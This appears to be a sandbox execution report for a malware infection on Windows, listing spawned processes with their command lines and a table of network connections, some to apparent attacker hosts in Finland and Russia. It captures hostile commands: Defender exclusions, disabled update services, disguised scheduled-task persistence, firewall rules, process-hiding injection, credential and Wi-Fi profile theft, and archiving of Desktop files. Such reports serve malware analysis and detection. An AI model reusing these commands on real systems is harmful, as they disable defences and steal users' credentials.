"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7016 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x47c 0x4a8
C:\Users\Admin\AppData\Local\Temp\3836.exe
C:\Users\Admin\AppData\Local\Temp\3836.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\41DC.exe
C:\Users\Admin\AppData\Local\Temp\41DC.exe
C:\Users\Admin\AppData\Local\Temp\4A79.exe
C:\Users\Admin\AppData\Local\Temp\4A79.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5672 -ip 5672
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 840
C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe"
C:\Users\Admin\AppData\Local\Temp\3DB5.exe
C:\Users\Admin\AppData\Local\Temp\3DB5.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8b5234212" /P "Admin:N"&&CACLS "..\e8b5234212" /P "Admin:R" /E&&Exit
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp" /SL4 $B01C0 "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" 4760119 79360
C:\Program Files (x86)\BBuster\BBuster.exe
"C:\Program Files (x86)\BBuster\BBuster.exe" -i
C:\Program Files (x86)\BBuster\BBuster.exe
"C:\Program Files (x86)\BBuster\BBuster.exe" -s
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6868 /prefetch:8
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 3
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:N"
C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\771604342093_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:R" /E
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6156 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\D3AF.exe
C:\Users\Admin\AppData\Local\Temp\D3AF.exe
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6156 /prefetch:8
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7780 /prefetch:1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,7027380036834228030,1460467160227751407,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| FI | 77.91.68.61:80 | tcp | |
| FI | 77.91.124.156:19071 | tcp | |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| FI | 77.91.68.249:80 | 77.91.68.249 | tcp |
| US | 8.8.8.8:53 | 29.68.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.68.91.77.in-addr.arpa | udp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| US | 8.8.8.8:53 | 73.255.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store.steampowered.com | udp |
| NL | 104.85.0.101:443 | store.steampowered.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| JP | 23.207.106.113:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.106.207.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.epicgames.com | udp |
| US | 18.233.1.119:443 | www.epicgames.com | tcp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 142.251.36.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 119.1.233.18.in-addr.arpa | udp |
